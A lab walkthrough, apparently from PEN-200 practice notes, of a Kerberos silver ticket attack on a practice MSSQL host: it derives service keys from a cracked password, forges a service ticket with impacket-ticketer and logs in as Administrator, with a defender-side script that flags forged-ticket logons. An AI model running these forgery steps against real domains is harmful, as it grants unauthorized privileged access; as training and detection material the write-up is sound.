Silver Ticket Attack (TGS Forgery)
The silver ticket attack crafts a valid TGS (service ticket) for a service once the service account's NTLM hash (or its AES Kerberos key) is known. Because the ticket is encrypted and signed with that service key rather than issued by the KDC, it is possible to gain access to the service by forging a custom TGS as any user. It is possible, and preferable for OPSEC, to forge tickets with the AES Kerberos keys (AES128 and AES256) rather than the NTLM hash.
The current context is that the svc_mssql account is a service account for the target MSSQL instance, with the SPN set to MSSQL/nagoya.nagoya-industries.com. The account has already been compromised through Kerberoasting earlier, and the target MSSQL instance has been tunneled for ease of access from Kali.
NTLM Hash or Kerberos Key (AES Hash)
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/nagoya]
└─$ ADKeygen -domain NAGOYA-INDUSTRIES.COM -user svc_mssql -pass Service1
[*] Salt: NAGOYA-INDUSTRIES.COMsvc_mssql
[+] AES256 Key: 24D73DD98EF15BF04ACF5D3FEB6741350D4011268AAC268935BDDE1AD463B05B
[+] AES128 Key: 42EFDE8C2CF59D161003833D776C6DD7
[+] NTLM Hash: E3A0168BC21CFB88B95C954A5B18F57C
Grabbing the AES256 key derived by ADKeygen from the svc_mssql password and the domain/user salt
TGS Forgery
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/nagoya]
└─$ impacket-ticketer gimmeMSSQL -spn MSSQL/nagoya.nagoya-industries.com -domain NAGOYA-INDUSTRIES.COM -domain-sid S-1-5-21-1969309164-1513403977-1686805993 -aesKey 24D73DD98EF15BF04ACF5D3FEB6741350D4011268AAC268935BDDE1AD463B05B
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Creating basic skeleton ticket and PAC Infos
[*] Customizing ticket for NAGOYA-INDUSTRIES.COM/gimmeMSSQL
[*] PAC_LOGON_INFO
[*] PAC_CLIENT_INFO_TYPE
[*] EncTicketPart
[*] EncTGSRepPart
[*] Signing/Encrypting final ticket
[*] PAC_SERVER_CHECKSUM
[*] PAC_PRIVSVR_CHECKSUM
[*] EncTicketPart
[*] EncTGSRepPart
[*] Saving ticket in gimmeMSSQL.ccache
Forging a TGS with an arbitrary account, gimmeMSSQL, for the MSSQL/nagoya.nagoya-industries.com SPN. The domain name, domain SID, and AES key of the service account (svc_mssql) were provided to build the TGS.
Session
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/nagoya]
└─$ KRB5CCNAME=gimmeMSSQL.ccache proxychains4 -q impacket-mssqlclient NAGOYA-INDUSTRIES.COM/@nagoya.nagoya-industries.com -no-pass -k -dc-ip $IP -target-ip $IP
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(nagoya\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(nagoya\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (160 3232)
[!] Press help for extra shell commands
SQL (NAGOYA-IND\Administrator dbo@master)>
SQL (NAGOYA-IND\Administrator dbo@master)> SELECT system_user;
------------------------
NAGOYA-IND\Administrator
SQL (NAGOYA-IND\Administrator dbo@master)> SELECT * FROM OPENROWSET(BULK N'C:\\Users\\Administrator\\Desktop\\proof.txt', SINGLE_CLOB) AS Contents
BulkColumn
---------------------------------------
b'224645acd3f84be05453c4d48fa35089\r\n'
Using the forged TGS, a session is established as the Administrator user with dbo privileges. It's likely that the target MSSQL is running as the svc_mssql account, given the home directory is present.
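As an added, defender-side example that is not part of the original write-up: the forged TGS above was built offline from svc_mssql's key and never requested from the KDC, so the DC has no 4769 entry for it while the SQL host still records a Kerberos 4624 logon. The script below correlates constructed sample events (the field layout, account names and timestamps are assumptions) to surface such orphan logons.

```python
# Added example, not code from the original write-up. A silver ticket is
# signed with the service key and never touches the KDC, so the service host
# logs a Kerberos logon (4624) for which the DC never logged a TGS request
# (4769). All events below are constructed sample data, not real logs.
from datetime import datetime, timedelta

SPN = "MSSQL/nagoya.nagoya-industries.com"

# DC security log: 4769 "A Kerberos service ticket was requested".
# Sample uses bare sAMAccountNames; real entries carry user@REALM.
DC_4769 = [
    {"time": "2024-05-01T10:00:05", "account": "svc_backup", "service": SPN},
    {"time": "2024-05-01T10:01:00", "account": "alice", "service": "CIFS/fileserver"},
]

# Service host (the SQL box) security log: 4624 network logons.
# The gimmeMSSQL entry mimics the forged ticket: a name that exists nowhere in AD.
HOST_4624 = [
    {"time": "2024-05-01T10:00:07", "account": "svc_backup", "package": "Kerberos", "logon_type": 3},
    {"time": "2024-05-01T10:12:30", "account": "gimmeMSSQL", "package": "Kerberos", "logon_type": 3},
    {"time": "2024-05-01T10:15:00", "account": "svc_mssql", "package": "NTLM", "logon_type": 3},
]


def _ts(s):
    return datetime.fromisoformat(s)


def find_orphan_kerberos_logons(dc_events, host_events, spn, window=timedelta(hours=10)):
    """Return host 4624 Kerberos logons with no preceding 4769 for the same
    account and SPN on the DC. The window is the default maximum service
    ticket lifetime (600 minutes): a legitimately cached ticket may be
    reused for that long after the KDC issued it."""
    orphans = []
    for logon in host_events:
        if logon["package"] != "Kerberos":
            continue  # NTLM logons are not ticket-based; out of scope here
        t = _ts(logon["time"])
        matched = any(
            e["account"].lower() == logon["account"].lower()
            and e["service"].lower() == spn.lower()
            and t - window <= _ts(e["time"]) <= t
            for e in dc_events
        )
        if not matched:
            orphans.append(logon)
    return orphans


if __name__ == "__main__":
    for o in find_orphan_kerberos_logons(DC_4769, HOST_4624, SPN):
        print(f"[!] Kerberos logon without a TGS request: {o['account']} at {o['time']}")
```

The DC only produces 4769 events when "Audit Kerberos Service Ticket Operations" is enabled, so the correlation is blind without that policy.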
Moving on to the Lateral Movement phase
Alternative
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/nagoya]
└─$ proxychains4 -q impacket-mssqlclient NAGOYA-INDUSTRIES.COM/svc_mssql@nagoya.nagoya-industries.com -dc-ip $IP -target-ip $IP -windows-auth
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
Password: Service1
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(nagoya\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(nagoya\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (160 3232)
[!] Press help for extra shell commands
SQL (NAGOYA-IND\svc_mssql guest@master)>
Or skip the silver ticket attack altogether and just authenticate as the svc_mssql account with the -windows-auth flag.